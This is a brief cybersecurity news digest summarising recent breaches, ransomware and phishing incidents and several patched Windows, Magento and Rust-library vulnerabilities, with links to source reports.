A concise roundup of notable incidents and high-risk exposures.
Top attacks and breaches
-
Toys “R” Us Canada — customer data leaked A breach exposed customer names, postal addresses, email addresses and phone numbers. Passwords and payment data were not reported compromised.
Source: www.bitdefender.com/en-us/blo… -
Askul (Japan) — ransomware halts online operations Ransomware led to the suspension of online ordering, registrations and shipments across Askul’s e-commerce sites, disrupting logistics for retailers including Muji and Sogo & Seibu.
Source: www.theregister.com/2025/10/2… -
Verisure / Alert Alarm (Sweden) — third-party system breach Unauthorized access to systems operated by an external billing partner exposed names, addresses, email addresses and Swedish social-security numbers for roughly 35,000 current and former Alert Alarm customers.
Source: www.verisure.com/press-rel… -
Jewett-Cameron (Oregon) — ransomware and data theft Attackers encrypted parts of internal systems and stole video meeting images, non-public financial documents and IT information. Operations were materially impacted.
Source: www.securityweek.com/fencing-a… -
LastPass — targeted phishing campaign steals ~$4.4M in crypto A phishing campaign impersonating inheritance workflows lured users into submitting master passwords and passkeys to spoofed sites, leading to vault compromise and cryptocurrency theft. The activity is attributed to CryptoChameleon (UNC5356).
Source: www.techradar.com/pro/secur… -
Lazarus / “DreamJob” — UAV/drone defence sector targeted Attackers distributed trojanized GitHub projects and fake job-offer lures to deploy the ScoringMathTea RAT, enabling theft of proprietary UAV designs and manufacturing know-how.
Source: www.eset.com/us/about/…
Vulnerabilities and patches
-
CVE-2025-33073 — Windows SMB Client EoP Patched June 2025. Exploitation coerces SMB authentication to gain SYSTEM-level access and may enable authenticated RCE when SMB signing is not enforced.
Microsoft: msrc.microsoft.com/update-gu…
NVD: nvd.nist.gov/vuln/deta… -
CVE-2025-59287 — Windows Server Update Services (WSUS) RCE Microsoft issued an out-of-band update on Oct. 23 2025 to address a critical flaw initially patched in the October cycle.
Details: www.cisa.gov/news-even… -
CVE-2025-54236 — “SessionReaper” (Adobe Commerce / Magento) Actively exploited. Allows session hijack via REST API and commonly used to deploy PHP webshells. A large portion of stores remain unpatched.
Adobe: helpx.adobe.com/security/… -
CVE-2025-62518 — async-tar / tokio-tar (Rust) A TAR desynchronization flaw enables file overwrite during extraction, creating broad supply-chain exposure. Forks are patched; abandoned dependencies remain in circulation.
NVD: nvd.nist.gov/vuln/deta…
